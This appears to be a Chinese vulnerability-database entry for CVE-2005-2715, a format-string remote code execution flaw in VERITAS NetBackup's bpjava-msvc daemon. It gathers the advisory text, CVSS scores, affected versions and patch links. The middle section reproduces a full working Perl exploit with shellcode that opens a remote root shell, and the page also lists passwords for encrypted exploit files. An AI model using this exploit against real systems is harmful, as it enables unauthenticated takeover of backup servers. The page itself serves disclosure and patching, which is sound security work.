CVE-2005-2715
CVSS10.0
发布时间 :2005-10-12 18:02:00
修订时间 :2008-09-05 16:52:30
NMCOEPS    

[原文]Format string vulnerability in the Java user interface service (bpjava-msvc) daemon for VERITAS NetBackup Data and Business Center 4.5FP and 4.5MP, and NetBackup Enterprise/Server/Client 5.0, 5.1, and 6.0, allows remote attackers to execute arbitrary code via the COMMAND_LOGON_TO_MSERVER command.


[CNNVD]Veritas NetBackup Data 'COMMAND_LOGON_TO_MSERVER'命令 字符处理漏洞(CNNVD-200510-073)

        Veritas NetBackup是大型的数据备份应用系统。
        VERITAS NetBackup Data and Business Center 4.5FP ,4.5MP, 和NetBackup Enterprise/Server/Client 5.0, 5.1, 6.0的bpjava-msvc守护程序不能正确的处理通过COMMAND_LOGON_TO_MSERVER命令传送的格式字符串数据,导致攻击者可以远程执行任意代码。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:symantec_veritas:netbackup_enterprise_server_client:5.1
cpe:/a:symantec_veritas:netbackup_data_and_business_center:4.5fp
cpe:/a:symantec_veritas:netbackup_enterprise_server_client:6.0
cpe:/a:symantec_veritas:netbackup_enterprise_server_client:5.0
cpe:/a:symantec_veritas:netbackup_data_and_business_center:4.5mp

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2715
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2715
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200510-073
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/495556
(PATCH)  CERT-VN  VU#495556
http://www.symantec.com/avcenter/security/Content/2005.10.12.html
(VENDOR_ADVISORY)  CONFIRM  http://www.symantec.com/avcenter/security/Content/2005.10.12.html
http://www.securityfocus.com/bid/15079
(PATCH)  BID  15079
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102054-1
(PATCH)  SUNALERT  102054
http://seer.support.veritas.com/docs/279085.htm
(PATCH)  CONFIRM  http://seer.support.veritas.com/docs/279085.htm
http://securitytracker.com/id?1015028
(PATCH)  SECTRACK  1015028
http://secunia.com/advisories/17181
(VENDOR_ADVISORY)  SECUNIA  17181
http://www.zerodayinitiative.com/advisories/ZDI-05-001.html
(VENDOR_ADVISORY)  MISC  http://www.zerodayinitiative.com/advisories/ZDI-05-001.html

- 漏洞信息

Veritas NetBackup Data 'COMMAND_LOGON_TO_MSERVER'命令 字符处理漏洞
危急 格式化字符串
2005-10-12 00:00:00 2007-02-02 00:00:00
远程  
        Veritas NetBackup是大型的数据备份应用系统。
        VERITAS NetBackup Data and Business Center 4.5FP ,4.5MP, 和NetBackup Enterprise/Server/Client 5.0, 5.1, 6.0的bpjava-msvc守护程序不能正确的处理通过COMMAND_LOGON_TO_MSERVER命令传送的格式字符串数据,导致攻击者可以远程执行任意代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.symantec.com/avcenter/security/Content/2005.10.12.html

- 漏洞信息 (1263)

Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (linux) (EDBID:1263)
multiple remote
2005-10-20 Verified
13722 Kevin Finisterre
N/A [点击下载]
#!/usr/bin/perl
##############################################################
# VERITAS-Linux.pl - VERITAS NetBackup Format Strings Linux/x86 Remote Exploit
# johnh[at]digitalmunition[dot]com
# bug found by kf_lists[at]digitalmunition[dot]com
# http://www.digitalmunition.com/
##############################################################

use POSIX;
use IO::Socket;
use IO::Select;
use strict;

print STDERR "\nveritas.pl - VERITAS NetBackup Format Strings Linux/x86 Remote Exploit\n";

if ($#ARGV == -1) {
        print "Usage:\n\t$0 <hostname> <port>\n\n";
        exit (1);
}

my $hostName = $ARGV[0];
my $port = $ARGV[1] || 13722;

buildexploit ($hostName, $port);

my $shellport = 5570;
print "[*] Connect to remote shell port\n";
my $sock = IO::Socket::INET->new (
                Proto => "tcp",
                PeerAddr => $hostName,
                PeerPort => $shellport,
                Type => SOCK_STREAM
);

if (! $sock)
{
        print "[*] Error, Seems Failed\n";
        exit (0);
}

print "[*] G0t R00T\n";

StartShell ($sock);

sub buildexploit
{
		my ($host, $port) = @_;
		my $s = IO::Socket::INET->new (
                	Proto => "tcp",
                	PeerAddr => $host,
               	 	PeerPort => $port,
                	Type => SOCK_STREAM
		);
				
		if (! $s)
		{
		        print "[*] Could not create socket: $!\n";
				        exit(0);
		}
				
		print $s " 118      1\nOWNED BABY\n";
		print scalar <$s>;
		print scalar <$s>;

		my $shellcode = "\x90" x 500 .
		"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x16\x81\x73\x17\x13\x99".
		"\x37\xe2\x83\xeb\xfc\xe2\xf4\x22\x42\xc0\x01\xa3\xff\x64\xa1\x40".
		"\xda\x64\x6b\xf2\xd2\xfa\x62\x9a\x5e\x65\x84\x7b\x8c\xf5\xa1\x75".
		"\xca\xbe\x03\xa3\x89\x67\xb3\x44\x10\xd6\x52\x75\x54\xb7\x52\x75".
		"\x2a\x33\x2f\x93\xc9\x67\xb5\x9a\x78\x74\x52\x75\x54\xb7\x6b\xca".
		"\x10\xf4\x52\x2c\xd0\xfa\x62\x52\x7b\xcf\xb3\x7b\xf7\x18\x91\x7b".
		"\xf1\x18\xcd\x71\xf0\xbe\x01\x42\xca\xbe\x03\xa3\x92\xfa\x62";
		my $retloc = 0x080b50ec; #0x080b53b4;
		my $retaddr = 0x80e0658; # can't use shellcode in stack.
		my $hi = ($retaddr >> 0) & 0xffff;
		my $lo = ($retaddr >> 16) & 0xffff;
				
				
		$hi = $hi - 0x28;
		$lo = (0x10000 + $lo + 0x28) - $hi - 0x50;		
				
		my $align = 3;
		my $buffer = " 101      6\n" . "a" x $align . pack ('l', $retloc) .  pack ('l', $retloc + 2) .
		"%." . $hi . "lx" . "%1694\$hn" .
		"%." . $lo . "lx" . "%1695\$hn" .
		$shellcode . "\n" .
		$shellcode . "\n" .
		"i\n" . "0wned\n" . "y0u\n".
		"boot.ini\n" . "\n";
				
		print STDERR "Sending " .length($buffer) . " bytes to remote\n";		
		sleep (10);				
		print $s $buffer;
		print scalar <$s>;		
				
		close $s;
}

sub StartShell 
{
        my ($client) = @_;	
	my $sel = IO::Select->new();
				
					
	# unbuffered fun.
				
				
	Unblock(*STDIN);			
	Unblock(*STDOUT);
	Unblock($client);
				
	select($client); $|++;
	select(STDIN);   $|++;
	select(STDOUT);  $|++;
				
	$sel->add($client);
	$sel->add(*STDIN);
				
	while (fileno($client))
	{		
		my $fd;
		my @fds = $sel->can_read(1);
				
		foreach $fd (@fds)
		{
			my $in = <$fd>;
			if (! $in || ! $fd || ! $client)
			{
				print "[*] Closing connection.\n";
				close($client);
				exit(0);            
			}
				
			if ($fd eq $client)
		        {
				print STDOUT $in;
				} else {
					print $client $in;
				}
			}
		}
		close ($client);
		exit (0);
}

sub Unblock {
        my $fd = shift;
        my $flags;
        $flags = fcntl($fd,F_GETFL,0) || die "Can't get flags for file handle: $!\n";
        fcntl($fd, F_SETFL, $flags|O_NONBLOCK) || die "Can't make handle nonblocking: $!\n";
}

# milw0rm.com [2005-10-20]
		

- 漏洞信息 (F40683)

Zero Day Initiative Advisory 05-01 (PacketStormID:F40683)
2005-10-13 00:00:00
ZDI,Tipping Point  zerodayinitiative.com
advisory,remote,arbitrary,code execution
CVE-2005-2715
[点击下载]

ZDI-05-001: VERITAS NetBackup Remote Code Execution - This vulnerability allows remote attackers to execute arbitrary code on vulnerable NetBackup installations.

ZDI-05-001: VERITAS NetBackup Remote Code Execution
http://www.zerodayinitiative.com/advisories/ZDI-05-001.html
October 12th, 2005

-- CVE ID:
CAN-2005-2715

-- Affected Vendor:
Symantec VERITAS

-- Affected Products:
VERITAS NetBackup Data and Business Center 4.5FP
VERITAS NetBackup Data and Business Center 4.5MP
VERITAS NetBackup Enterprise/Server/Client 5.0
VERITAS NetBackup Enterprise/Server/Client 5.1
VERITAS NetBackup Enterprise/Server/Client 6.0

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since September 15th, 2005 by Digital Vaccine protection
filter ID 3766. For further product information on the TippingPoint IPS:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable NetBackup installations. Authentication is not required to
exploit this vulnerability.

This specific flaw exists within the bpjava-msvc daemon due to incorrect
handling of format string data passed through the
'COMMAND_LOGON_TO_MSERVER' command. The vulnerable daemon listens on
TCP port 13722 and affects both NetBackup clients and servers.

-- Vendor Response:
Symantec Engineers have verified this issue and made security updates
available for the supported VERITAS NetBackup products. Symantec
strongly recommends all customers immediately apply the latest updates
for their supported product versions to protect against these types of
threats. Please refer to the Symantec advisory for update information:

    http://www.symantec.com/avcenter/security/Content/2005.10.12.html

-- Disclosure Timeline:
2005.09.12 - Vulnerability reported to vendor
2005.09.15 – Digital Vaccine released to TippingPoint customers
2005.10.11 – Vulnerability information provided to ZDI security partners
2005.10.12 – Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Kevin Finisterre with exploitation
assistance from JohnH.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product. 
    

- 漏洞信息

19949
VERITAS NetBackup bpjava-msvc Daemon Remote Format String
Remote / Network Access, Local / Remote, Context Dependent Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Private, Exploit Commercial Vendor Verified

- 漏洞描述

- 时间线

2005-10-12 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Veritas has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

VERITAS NetBackup Java User-Interface Remote Format String Vulnerability
Input Validation Error 15079
Yes No
2005-10-12 12:00:00 2007-11-01 10:26:00
Discovered by Kevin Finisterre with assistance from JohnH.

- 受影响的程序版本

Veritas Software NetBackup Server 6.0
Veritas Software NetBackup Server 5.1
Veritas Software NetBackup Server 5.1
Veritas Software NetBackup Server 5.0
Veritas Software NetBackup Server 5.0
Veritas Software NetBackup Server 3.4
Veritas Software NetBackup Global Data Manager 5.0
Veritas Software NetBackup Global Data Manager 4.5 MP4
Veritas Software NetBackup Global Data Manager 4.5 MP3
Veritas Software NetBackup Global Data Manager 4.5 MP2
Veritas Software NetBackup Global Data Manager 4.5 MP1
Veritas Software NetBackup Global Data Manager 4.5 FP4
Veritas Software NetBackup Global Data Manager 4.5 FP3
Veritas Software NetBackup Global Data Manager 4.5 FP2
Veritas Software NetBackup Global Data Manager 4.5 FP1
Veritas Software NetBackup Global Data Manager 4.5
Veritas Software NetBackup for NetWare Media Servers 5.1 MP3
Veritas Software NetBackup for NetWare Media Servers 5.1 MP2
Veritas Software NetBackup for NetWare Media Servers 5.1 MP1
Veritas Software NetBackup for NetWare Media Servers 5.1
Veritas Software NetBackup for NetWare Media Servers 5.0 MP5
Veritas Software NetBackup for NetWare Media Servers 5.0 MP4
Veritas Software NetBackup for NetWare Media Servers 5.0 MP3
Veritas Software NetBackup for NetWare Media Servers 5.0 MP2
Veritas Software NetBackup for NetWare Media Servers 5.0 MP1
Veritas Software NetBackup for NetWare Media Servers 5.0
Veritas Software NetBackup for NetWare Media Servers 4.5 MP8
Veritas Software NetBackup for NetWare Media Servers 4.5 MP7
Veritas Software NetBackup for NetWare Media Servers 4.5 MP6
Veritas Software NetBackup for NetWare Media Servers 4.5 MP5
Veritas Software NetBackup for NetWare Media Servers 4.5 MP4
Veritas Software NetBackup for NetWare Media Servers 4.5 MP3
Veritas Software NetBackup for NetWare Media Servers 4.5 MP2
Veritas Software NetBackup for NetWare Media Servers 4.5 MP1
Veritas Software NetBackup for NetWare Media Servers 4.5 FP8
Veritas Software NetBackup for NetWare Media Servers 4.5 FP7
Veritas Software NetBackup for NetWare Media Servers 4.5 FP6
Veritas Software NetBackup for NetWare Media Servers 4.5 FP5
Veritas Software NetBackup for NetWare Media Servers 4.5 FP4
Veritas Software NetBackup for NetWare Media Servers 4.5 FP3
Veritas Software NetBackup for NetWare Media Servers 4.5 FP2
Veritas Software NetBackup for NetWare Media Servers 4.5 FP1
Veritas Software NetBackup for NetWare Media Servers 4.5
Veritas Software NetBackup Enterprise Server 6.0
Veritas Software NetBackup Enterprise Server 5.1
Veritas Software NetBackup Enterprise Server 5.0
Veritas Software NetBackup DataCenter 5.0
Veritas Software NetBackup DataCenter 4.5 MP
Veritas Software NetBackup DataCenter 4.5 FP
Veritas Software NetBackup DataCenter 4.5
Veritas Software NetBackup DataCenter 3.4
Veritas Software NetBackup Client 6.0
Veritas Software NetBackup Client 5.1
Veritas Software NetBackup Client 5.0
Veritas Software NetBackup BusinesServer 4.5 MP
Veritas Software NetBackup BusinesServer 4.5 FP
Veritas Software NetBackup BusinesServer 4.5
Veritas Software NetBackup BusinesServer 3.4
Veritas Software NetBackup Advanced Reporter 4.5 MP4
Veritas Software NetBackup Advanced Reporter 4.5 MP3
Veritas Software NetBackup Advanced Reporter 4.5 MP2
Veritas Software NetBackup Advanced Reporter 4.5 MP1
Veritas Software NetBackup Advanced Reporter 4.5 FP4
Veritas Software NetBackup Advanced Reporter 4.5 FP3
Veritas Software NetBackup Advanced Reporter 4.5 FP2
Veritas Software NetBackup Advanced Reporter 4.5 FP1
Veritas Software NetBackup Advanced Reporter 4.5
Veritas Software NetBackup DataCenter for Windows 4.5 MP
Veritas Software NetBackup BusinesServer for Windows 4.5 MP

- 不受影响的程序版本

Veritas Software NetBackup DataCenter for Windows 4.5 MP
Veritas Software NetBackup BusinesServer for Windows 4.5 MP

- 漏洞讨论

NetBackup Java user interface is affected by a remote format-string vulnerability.

An attacker can exploit this vulnerability by crafting a malicious request that contains format specifiers. A successful attack may crash the server or lead to arbitrary code execution. This may facilitate unauthorized access or privilege escalation with SYSTEM or superuser privileges.

- 漏洞利用

Exploits for Windows, Linux, and Mac OS X platforms have been supplied by <johnh@digitalmunition.com> & <kf@digitalmunition.com>.

VERITAS-Linux.pl.gpg:

pass: allaroundthemulberrybush

VERITAS-OSX.pl.gpg:

pass: themonkeychasedtheweasel

VERITAS-WIN32.pl.gpg:

pass: apennyforaneedle

The following exploit is available to members of the Immunity Partner's Program:

https://www.immunityinc.com/downloads/immpartners/netbackup_javaui.tgz

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

- 解决方案

Fixes are available.


Veritas Software NetBackup DataCenter 4.5 FP

Veritas Software NetBackup DataCenter 4.5 MP

Veritas Software NetBackup BusinesServer 4.5 FP

Veritas Software NetBackup BusinesServer 4.5 MP

Veritas Software NetBackup Enterprise Server 5.0

Veritas Software NetBackup Server 5.0

Veritas Software NetBackup Server 5.0

Veritas Software NetBackup Enterprise Server 5.1

Veritas Software NetBackup Server 5.1

Veritas Software NetBackup Server 5.1

Veritas Software NetBackup Server 6.0

Veritas Software NetBackup Enterprise Server 6.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站